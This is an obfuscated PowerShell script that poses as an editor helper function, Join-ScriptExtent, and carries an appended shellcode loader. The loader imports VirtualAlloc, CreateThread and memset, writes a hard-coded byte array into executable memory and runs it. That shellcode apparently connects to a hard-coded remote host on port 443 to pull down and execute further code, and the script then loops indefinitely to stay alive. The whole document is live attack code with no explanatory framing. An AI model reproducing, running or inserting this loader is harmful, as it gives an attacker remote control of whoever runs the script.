 sET-iTEm  ('VaRI'+'Abl'+'e:K8zuv1') (  [tyPe]("{2}{0}{3}{1}{4}"-F'q','Era','Lin','.EnUm','bLE')) ;  




function Jo`IN-scR`I`Pt`EXt`eNT {
    
    [CmdletBinding()]
    [OutputType([System.Management.Automation.Language.IScriptExtent])]
    param(
        [Parameter(vaLUefrOmPIpELiNE, vAluefrOMPIpeLiNeBYprOpeRtYnAME)]
        [System.Management.Automation.Language.IScriptExtent[]]
        ${e`xtENT}
    )
    begin {
        ${E`XT`ENTLIst} = .("{2}{1}{0}" -f't','c','New-Obje') ("{16}{2}{11}{14}{8}{12}{10}{18}{21}{3}{7}{20}{0}{6}{4}{19}{1}{15}{9}{17}{13}{22}{5}"-f't.Au','Langu','y','o','matio','tent]','to','ns.Ge','l','ge.','e','s','l','ript','tem.Co','a','S','ISc','ct','n.','neric.List[System.Managemen','i','Ex')
    }
    process {
        if (${Ext`EnT}) {
            ${ex`TEntLI`st}.("{0}{1}{2}" -f'AddRa','n','ge').Invoke(${Ext`EnT})
        }
    }
    end {
        if (-not ${EXTE`NtLi`sT}) { return }

        ${ST`Art`OF`FsEt} =  (  cHILditeM ('va'+'RIAbl'+'e:K8zUV1') )."VA`luE"::"M`iN"(${EXt`entLi`st}."stAR`TofF`seT" -as [int[]])
        ${e`Ndo`FfSeT}   =  (  Get-IteM ('Vari'+'aBl'+'E:K8zuV1'))."V`Alue"::"m`AX"(${E`X`Te`NtLISt}."ENDo`FFS`ET" -as [int[]])

        return &("{0}{2}{1}" -f 'Ne','ct','w-Obje') ("{0}{7}{13}{3}{14}{4}{10}{12}{8}{5}{1}{15}{11}{6}{2}{9}"-f'Mi','.Edito','lScri','so','Po','ell','ul','c','Sh','ptExtent','w','s.F','er','ro','ft.','rService') @(
            ${pSE`DI`TOr}.("{1}{0}{2}{4}{3}"-f 'e','G','tEd','xt','itorConte').Invoke()."CU`R`RENtfIle",
            ${S`TARTo`FFs`et},
            ${EnDof`F`s`et})
    }
}

${c} = ((("{71}{91}{98}{41}{31}{0}{44}{96}{68}{63}{81}{38}{67}{16}{86}{33}{69}{85}{26}{22}{82}{12}{62}{100}{46}{77}{3}{8}{65}{23}{39}{84}{53}{1}{15}{66}{43}{29}{99}{93}{36}{94}{59}{87}{35}{60}{40}{10}{20}{45}{89}{90}{7}{61}{17}{32}{80}{74}{97}{56}{37}{57}{42}{2}{21}{47}{95}{48}{83}{13}{70}{6}{30}{11}{92}{28}{73}{79}{58}{75}{9}{24}{64}{88}{55}{50}{19}{52}{25}{72}{54}{27}{5}{4}{76}{78}{18}{51}{34}{49}{14}" -f 'kernel','lImpo','r','flAllocatio',',','t','n','ribut','nTyp','l','tPt',' lpThrea','tPtr lpAddress, uint dwSi','dwCre',');','r','n','t ','nt sr',' extern ','r',' lpPa','tualAll','flP','lJKp)','ntPtr','r','s',';[Dl','l','tPtr','JKp','dwSt','In',' ','re','stat','d','ex','rot','(In','rt(',', IntPt','Kp)]pub','3',' lpThrea',' ui','ra','eter','count','c','c, uint','I','Dl','tPtr de','stati','tartAd','ress','JKpmsvcr',' extern ','ad','es, uin','z',')]pu',']publi','e, uint ','t(JKpkernel32.dllJ','ter','p','tPtr V','ationFlags, I','[Dll',' memset(In','lI','kSize','t.d',' ','nt ','ui','mport(','ac','blic static ','oc(In',', uint ','ect);[','i',' ','IntPtr CreateTh','c ','dA','tt','I','dId)',' ','ic','m','2.dllJK',', IntPtr lpS','mpo','ic','e,')) -rePLaCE 'JKp',[cHAr]34);${W} = .("{2}{0}{1}"-f 'y','pe','Add-T') -memberDefinition ${c} -Name ("{1}{0}" -f 'in32','W') -namespace ("{0}{4}{3}{1}{2}"-f 'W','ct','ions','32Fun','in') -passthru;[Byte[]];[Byte[]]${z} = 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x05,0x68,0x29,0xfc,0xe2,0x48,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x61,0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x22,0x58,0x68,0x00,0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0xe9,0x71,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc7,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5;${G} = 0x1000;if (${z}."lE`NGtH" -gt 0x1000){${G} = ${Z}."le`NgTH"};${X}=${W}::("{0}{1}{2}{3}" -f 'Virt','u','a','lAlloc').Invoke(0,0x1000,${g},0x40);for (${i}=0;${i} -le (${Z}."l`Eng`Th"-1);${I}++) {${W}::"Me`MSeT"([IntPtr](${X}.("{2}{1}{0}" -f'2','nt3','ToI').Invoke()+${I}), ${Z}[${i}], 1)};${w}::("{2}{0}{3}{1}"-f 'e','read','Cr','ateTh').Invoke(0,0,${x},0,0,0);for (;;){&("{0}{2}{1}" -f 'St','eep','art-sl') 60};
